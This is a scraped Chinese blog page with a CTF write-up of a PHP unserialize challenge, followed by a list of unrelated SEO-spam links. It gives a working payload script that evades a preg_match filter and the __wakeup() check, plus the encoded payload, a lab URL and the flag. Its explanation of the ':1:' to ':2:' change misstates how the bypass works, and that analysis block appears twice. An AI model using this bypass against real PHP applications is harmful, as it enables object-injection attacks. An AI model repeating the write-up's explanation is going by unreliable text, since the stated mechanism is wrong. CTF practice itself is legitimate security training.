当前位置: 首页 > news >正文

百度上的网站怎么做厦门seo排名

百度上的网站怎么做,厦门seo排名,企业标识图片logo,产品网站 模板1、题目描述 2、 3、分析代码 class Demo { private $file fl4g.php; }:定义了一个名为Demo的类,该类有一个私有属性$file,默认值为fl4g.php。 $a serialize(new Demo);:创建了一个Demo类的实例,并对其进行序列化&a…

1、题目描述

2、

3、分析代码

  1. class Demo { private $file = 'fl4g.php'; }:定义了一个名为Demo的类,该类有一个私有属性$file,默认值为fl4g.php

  2. $a = serialize(new Demo);:创建了一个Demo类的实例,并对其进行序列化,然后将序列化后的字符串赋值给变量$a

  3. $a = str_replace('O:4', 'O:+4',$a);:这行代码的目的是绕过preg_match('/[oc]:\d+:/i', $var)这样的正则表达式检查。原始的序列化字符串中,O:4表示的是一个对象,后面的数字4表示类名的长度。通过将4替换为+4,可以使正则表达式无法匹配,从而绕过检查。

  4. $a = str_replace(':1:', ':2:',$a);:这行代码的目的是绕过__wakeup()函数的检查。在__wakeup()函数中,如果$this->file的值不等于index.php,就会被重置为index.php。通过将序列化字符串中的:1:替换为:2:,可以使$this->file的值始终等于index.php,从而绕过检查。

  5. echo base64_encode($a);:最后,将修改后的序列化字符串进行Base64编码,然后输出。

4、根据代码中的提示,我们将fl4g.php进行base64编码后的值传给var,试着访问但是页面没有回显

5、根据题目我们需要进行序列化(代码引用这篇文章:攻防世界之Web_php_unserialize(超详细WP)_php unserialize-CSDN博客)

6、在源代码中我们需要绕过几个函数

<?php
class Demo { private $file = 'fl4g.php';
}
$a = serialize(new Demo);
$a = str_replace('O:4', 'O:+4',$a); //绕过preg_match()函数
$a = str_replace(':1:', ':2:',$a); //绕过__wakeup()函数
echo ($a);                  
?>

7、运行代码可以看到序列后的结果

O:+4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";}

将a的值进行编码

TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ== 

8、

  1. class Demo { private $file = 'fl4g.php'; }:定义了一个名为Demo的类,该类有一个私有属性$file,默认值为fl4g.php

  2. $a = serialize(new Demo);:创建了一个Demo类的实例,并对其进行序列化,然后将序列化后的字符串赋值给变量$a

  3. $a = str_replace('O:4', 'O:+4',$a);:这行代码的目的是绕过preg_match('/[oc]:\d+:/i', $var)这样的正则表达式检查。原始的序列化字符串中,O:4表示的是一个对象,后面的数字4表示类名的长度。通过将4替换为+4,可以使正则表达式无法匹配,从而绕过检查。

  4. $a = str_replace(':1:', ':2:',$a);:这行代码的目的是绕过__wakeup()函数的检查。在__wakeup()函数中,如果$this->file的值不等于index.php,就会被重置为index.php。通过将序列化字符串中的:1:替换为:2:,可以使$this->file的值始终等于index.php,从而绕过检查。

  5. echo base64_encode($a);:最后,将修改后的序列化字符串进行Base64编码,然后输出。

 

9、访问url:61.147.171.105:65034/?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

10、

ctf{b17bd4c7-34c9-4526-8fa8-a0794a197013}

http://www.mmbaike.com/news/28323.html

相关文章:

  • 设计素材网站p开头的优化关键词排名seo
  • 湖北省政府网站集约化建设网络营销的概述
  • 免费发布信息网址大全谷歌seo排名工具
  • 如何做外贸独立网站seo优化方向
  • 如何做流量网站百度百科官网
  • 网站建设专家北京注安软文营销的技巧
  • flash动画制作教程济南seo顾问
  • 专做宝宝辅食的网站服务器域名怎么注册
  • 网站聊天系统怎么做市场调研的方法有哪些
  • 干事儿网网站开发百度搜索引擎seo
  • php网站制作过程中遇到的问题及解决办法品牌策划推广方案
  • 上海正规做网站公司有哪些百度视频推广怎么收费
  • b2b网站排名大全最全的搜索引擎
  • 自建服务器做网站要备案2023免费推广入口
  • 西安营销型网站制作引流推广平台软件
  • 怎么访问域名网站汕头网站建设平台
  • 电商运营培训课程有哪些seo优
  • 如何在社交网站做销售重庆百度推广关键词优化
  • 新疆乌鲁木齐新闻头条站长工具seo综合查询是什么
  • 注册一个公司需要什么资料网络优化seo
  • qq教程网站织梦推广关键词排名方法
  • 高端网站开发找苏州觉世品牌链交换反应
  • 宁波建设网站公司企业微信管理系统
  • 厦门市海沧区建设局网站如何让关键词排名靠前
  • 贵阳小程序商城建设重庆seo标准
  • 软件开发 网站开发 不同软文广告经典案例分析
  • jsp做的网站有哪些seo交流中心
  • 新网站怎么做谷歌推广呢seo优化宣传
  • wordpress pdf 打印重庆seo代理计费
  • 做网站 花园路国贸企业网站seo哪里好